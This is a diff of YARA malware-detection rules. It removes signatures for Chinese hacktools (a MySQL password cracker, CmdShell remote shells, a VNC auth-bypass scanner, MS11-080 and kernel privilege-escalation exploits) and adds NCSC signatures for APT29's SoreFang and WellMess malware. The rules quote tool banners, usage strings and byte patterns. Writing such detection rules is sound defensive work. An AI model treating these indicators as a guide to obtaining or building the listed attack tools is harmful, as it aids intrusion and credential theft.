+		id = "7a058ec7-f795-5226-b511-ff469a969ee6"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1893-L1911"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L120-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
-		logic_hash = "c2487306a0d82ab76a048c001361c25bcd61d0f7a57a3b22df1c70299f0a72ba"
+		hash = "2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41"
+		logic_hash = "90e8480aa50e18202007bcffdc8348290ad0ac0588c924b4f75ea425a6cae32d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
-		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii
-		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
-		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii
-		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
-		$s6 = "NTcmd>" fullword ascii
+		$s1 = "HealthInterval" wide
+		$s2 = "Hello from Proxy" wide
+		$s3 = "Start bot:" wide
+		$s4 = "FromNormalToBase64" ascii
+		$s5 = "FromBase64ToNormal" ascii
+		$s6 = "WellMess" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 2 of them
+		uint16( 0 ) == 0x5a4d and uint16( uint16( 0x3c ) ) == 0x4550 and 3 of them
 }
-rule SIGNATURE_BASE_Mysql_Pwd_Crack : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_Schedule : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3ddeb1c7-e124-5e9e-abcf-3856e0561165"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on the key schedule used for encryption"
+		author = "NCSC"
+		id = "8d89edc1-a9fc-5155-9dc2-8d7f952f90d1"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1913-L1930"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L138-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
-		logic_hash = "d272b98a6cf2749482ee501734d0043564ba528770161cb0ed4f032409305f22"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "d4f7ec82e51f1063b4d61302e5ff9268dd3233bb44269fc32cb57fb9240f96e2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
-		$s2 = "Successfully --> username %s password %s " fullword ascii
-		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
-		$s4 = "-a automode  automatic crack the mysql password " fullword ascii
-		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
+		$ = { C7 05 ?? ?? ?? ?? 63 51 E1 B7 B8 ?? ?? ?? ?? 8B 48
+            FC 81 E9 47 86 C8 61 89 08 83 C0 04 3D ?? ?? ?? ??
+            7E EB 33 D2 33 C9 B8 2C 00 00 00 89 55 D4 33 F6 89
+            4D D8 33 DB 3B F8 0F 4F C7 8D 04 40 89 45 D0 83 F8
+            01 7C 4F 0F 1F 80 00 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Cmdshell64 : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_2B62 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file CmdShell64.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f4d69be7-f717-53f7-873e-86acbb309106"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on hardcoded encryption key"
+		author = "NCSC"
+		id = "9a7abad7-1cfa-52c8-9416-47cb80486714"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1932-L1951"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L155-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
-		logic_hash = "fd8010ab2ab51feed62475f840ffaeef92cf1266c139b8f669b7fa5ff646fdab"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "39ad6de70883fbe0377379c3cab15962372793043ebbf4054efb7cee3aff9104"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
-		$s2 = "ServiceCmdShell" fullword ascii
-		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
-		$s4 = "ServiceSystemShell" fullword wide
-		$s5 = "[Root@CmdShell ~]#" fullword wide
-		$s6 = "Hello Man 2015 !" fullword wide
-		$s7 = "CmdShell" fullword ascii
+		$ = "2b6233eb3e872ff78988f4a8f3f6a3ba"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 4 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Ms_Viru_V : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Directory_Enumeration_Output_Strings : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file v.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "88a01e7a-8210-5e0c-a9b8-b7c9b991e16b"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on formatted string output for directory enumeration"
+		author = "NCSC"
+		id = "e24dbda1-3d43-52a7-9249-70a648f4913e"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1953-L1971"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L169-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
-		logic_hash = "028b589c11eeacb2edfeeaeaebf2da370e540cba964c9ebbb19e4c734afe190f"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "8f029269f5a383737f38af04b05a16a71af5453bffe83e04ac53191eaa49d3e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
-		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
-		$s3 = "OH,Sry.Too long command." fullword ascii
-		$s4 = "Success! Commander." fullword ascii
-		$s5 = "Hey,how can racle work without ur command ?" fullword ascii
-		$s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
+		$ = "----------All usres directory----------"
+		$ = "----------Desktop directory----------"
+		$ = "----------Documents directory----------"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
 }
-rule SIGNATURE_BASE_CN_Tools_Vscan : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Command_Elem_Cookie_Ga_Boundary_String : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Vscan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2d73d9c9-62cd-592f-a44e-0a0456c85a3c"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on scheduled task element and Cookie header/boundary strings"
+		author = "NCSC"
+		id = "3c6ffbad-9b39-5518-aa66-d76531ddb9ea"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1973-L1990"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L185-L199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
-		logic_hash = "2bbf0a3fb2b3fc9b646c6f8fc021f65a38e1b64edd74301481051541f8938902"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "65b31a12d8abb88fbb99fcc6b2707bec90e4edc35d0cf21903213eda5cacec88"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
-		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
-		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
-		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
-		$s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii
+		$ = "<Command>" wide
+		$ = "Cookie:_ga="
+		$ = "------974767299852498929531610575"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
 }
-rule SIGNATURE_BASE_Dos_Iis : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Round_Function : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file iis.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on the encryption round function"
+		author = "NCSC"
+		id = "0be1c084-c8df-5920-a320-90364a7fb542"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1992-L2011"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L201-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
-		logic_hash = "d6852af79eac659f4dfa3019793290e0498739f02a06c5540cd7d2c65b46b960"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "c4979b7ec31581b43b6975be5d4b1bfa5562e5fe25bbb51bb7c388550ed80ac6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "comspec" fullword ascii
-		$s2 = "program terming" fullword ascii
-		$s3 = "WinSta0\\Defau" fullword ascii
-		$s4 = "* FROM IIsWebInfo" ascii
-		$s5 = "www.icehack." ascii
-		$s6 = "wmiprvse.exe" fullword ascii
-		$s7 = "Pid: %d" ascii
+		$ = { 8A E9 8A FB 8A 5D 0F 02 C9 88 45 0F FE C1 0F BE C5 88 6D F3 8D
+            14 45 01 00 00 00 0F AF D0 0F BE C5 0F BE C9 0F AF C8 C1 FA 1B C0 E1 05 0A D1 8B 4D EC 0F BE C1 89 55 E4 8D 14 45 01 00 00 00 0F AF D0 8B C1}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Iisputscannesr : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Add_Random_Commas_Spaces : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file IISPutScannesr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c5d358e8-955f-5b96-89e7-eb0b6c4d0af0"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on function that adds commas and spaces"
+		author = "NCSC"
+		id = "9a89c619-6309-500f-b4dc-c8a3e8fc4417"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2013-L2027"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L216-L229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
-		logic_hash = "27c190050aabcdff3713b388adb0113ad2334c107a2a7b3d682c209b102cf642"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "046e222aabc9e596d9536702521b4729d990e1f327ded004ca984b73a8511a83"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "yoda & M.o.D." ascii
-		$s2 = "-> come.to/f2f **************" fullword ascii
+		$ = { E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B CE 83 FA 04 7E 09 6A
+            02 68 ?? ?? ?? ?? EB 07 6A 01 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Unknown_CN_Generate : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Modify_Alphabet_Custom_Encode : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Generate.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "88ad2c71-519f-58b0-87f8-a6f54a54a774"
-		date = "2015-06-13"
-		modified = "2022-01-20"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2029-L2047"
+		description = "Rule to detect SoreFang based on arguments passed into custom encoding algorithm function"
+		author = "NCSC"
+		id = "7c5c1be0-ccad-5c8f-a026-445994b1f279"
+		date = "2016-12-30"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L231-L243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
-		logic_hash = "a83000880bd71f4ee6507cb448b611cb670a47a4dc47c400930d3a41ca594a5d"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "f0f5bcad52b0b15dc74a51973ef2752234bd12d677c846b2f96fe569d906ea3b"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\TEMP\\" ascii
-		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
-		$s3 = "$530 Please login with USER and PASS." fullword ascii
-		$s4 = "_Shell.exe" fullword ascii
-		$s5 = "ftpcWaitingPassword" fullword ascii
+		$ = { 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46
+            64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Pc_Rejoice : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Custom_Encode_Decode : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file rejoice.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "197b5a21-e1ed-5ea8-b7f2-e84684aedc54"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on the custom encoding/decoding algorithm function"
+		author = "NCSC"
+		id = "4885a659-bb3a-5e33-99cc-b827931bf58f"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2049-L2067"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L245-L274"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
-		logic_hash = "9e22a98b5065a95a7f169fda8d6d4112101bffa11a1407e03ec152db41857206"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "536147bda9603d68748010f9db260af732fe0865a601ae1104538933b19c519b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
-		$s2 = "http://www.xxx.com/xxx.exe" fullword ascii
-		$s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
-		$s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s5 = "ListViewProcessListColumnClick!" fullword ascii
-		$s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
+		$ = { 55 8B EC 8B D1 53 56 8B 75 08 8B DE 80 42 62 FA 8A 4A 62 66 D3
+            EB 57 3A 5A 5C 74 0F}
+		$ = { 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE C1 88 4A 62 8A
+            4A 62 B8 01 00 00 00}
+		$ = { 8A 46 62 84 C0 74 3E 3C 06 73 12 0F B6 C0 B9 06 00 00 00 2B C8
+            C6 46 62 06 66 D3 66 60 0F B7 4E 60}
+		$ = { 80 3C 38 0D 0F 84 93 01 00 00 C6 42 62 06 8B 56 14 83 FA 10 72
+            04 8B 06}
+		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5B 3B C8 75 07 8B 55 EC B3 3E}
+		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5E 3B C8 75 0B 8B 55 EC D0 EB C6
+            42 62 05}
+		$ = { 8B 55 EC 0F BE 04 38 0F B6 DB 0F B6 4A 5F 3B C1 B8 3F 00 00 00
+            0F 44 D8}
+		$ = { 8A 4A 62 66 8B 52 60 66 D3 E2 0F B6 C3 66 0B D0 8B 45 EC 66 89
+            50 60 8A 45 F3 02 C1 88 45 F3 3C 08 72 2E 04 F8 8A C8 88 45 F3
+            66 D3 EA 8B 4D 08 0F B6 C2 50 }
+		$ = { 3A 5A 5C 74 0F 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE
+            C1 88 4A 62 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Ms11080_Withcmd : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Remove_Chars_Comma_Space_Dot : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fa5002ac-d6e6-543f-8020-43dfae689b3b"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2069-L2087"
+		description = "Rule to detect SoreFang based on function that removes commas, spaces and dots"
+		author = "NCSC"
+		id = "c15779b0-6a5e-5345-94ad-95615b567f1f"
+		date = "2016-12-30"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L276-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
-		logic_hash = "cd7167269538a5dd197260682ad777f87e43cc2155acf3ce731d1a065395cf4a"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "652607e0cfe6f5ad6ede169e28f63e8262fc37cbc7baa2525e52e79572d9a468"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
-		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii
-		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
-		$s4 = "[>] create porcess error" fullword ascii
-		$s5 = "[>] ms11-080 Exploit" fullword ascii
+		$ = {8A 18 80 FB 2C 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$ = {8A 18 80 FB 2E 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$ = {8A 18 80 FB 20 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_Othertools_Xiaoa : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Disk_Enumeration_Strings : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xiaoa.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a456d373-2063-5264-8cf4-d0a5918392fc"
-		date = "2015-06-13"
+		description = "Rule to detect SoreFang based on disk enumeration strings"
+		author = "NCSC"
+		id = "0ff01793-6fb7-5cff-b4e4-6709269ab0f0"
+		date = "2016-12-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2089-L2107"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L291-L310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6988acb738e78d582e3614f83993628cf92ae26d"
-		logic_hash = "451ed602bd1e9dd7e4020108ea133b60c546965bd77be349d07be42150f80fee"
+		hash = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
+		logic_hash = "4a225b767dc922625c333aea866638bc5e239137592e46c17563b9cc380b0eea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
-		$s2 = "The shell \"cmd\" success!" fullword ascii
-		$s3 = "Not Windows NT family OS." fullword ascii
-		$s4 = "Unable to get kernel base address." fullword ascii
-		$s5 = "run \"%s\" failed,code: %d" fullword ascii
-		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
+		$ = "\x0D\x0AFree on disk: "
+		$ = "Total disk: "
+		$ = "Error in GetDiskFreeSpaceEx\x0D\x0A"
+		$ = "\x0D\x0AVolume label: "
+		$ = "Serial number: "
+		$ = "File system: "
+		$ = "Error in GetVolumeInformation\x0D\x0A"
+		$ = "I can not het information about this disk\x0D\x0A"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_Unknown2 : FILE
+rule SIGNATURE_BASE_Sysinternals_Tool_Anomaly : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file unknown2.exe"
+		description = "SysInternals Tool Anomaly - does not contain Mark Russinovich as author"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af7ddcbf-1cba-51a9-b435-9a267320f502"
-		date = "2015-06-13"
+		id = "b676726b-7ecd-52ed-bdec-3d81b7596246"
+		date = "2016-12-06"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2109-L2128"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sysinternals_anomaly.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
-		logic_hash = "dea499eaa87cc454a31672fb842539779926d50785ef827162fde84bfcdcc54a"
-		score = 75
+		logic_hash = "760795a51965197bd101ffbf0f7c8cfbbb16d2f443d0941de4a75c8f33f4cad0"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" wide
-		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide
-		$s3 = "http://www.md5.com.cn" fullword wide
-		$s4 = "1.5.exe" fullword wide
-		$s5 = "\\Set.ini" wide
-		$s6 = "OpenFileDialog1" fullword wide
-		$s7 = " (*.txt)|*.txt" fullword wide
+		$s1 = "Software\\Sysinternals\\%s" fullword ascii
+		$n1 = "Mark Russinovich" wide ascii
+		$nfp1 = "<<<Obsolete>>>" fullword wide
+		$nfp2 = "BGInfo - Wallpaper text configurator" wide
+		$nfp3 = "usage: movefile [source] [dest]" wide
+		$nfp4 = "LoadOrder information has been copied" wide
+		$nfp5 = "Cache working set cleared" wide
 
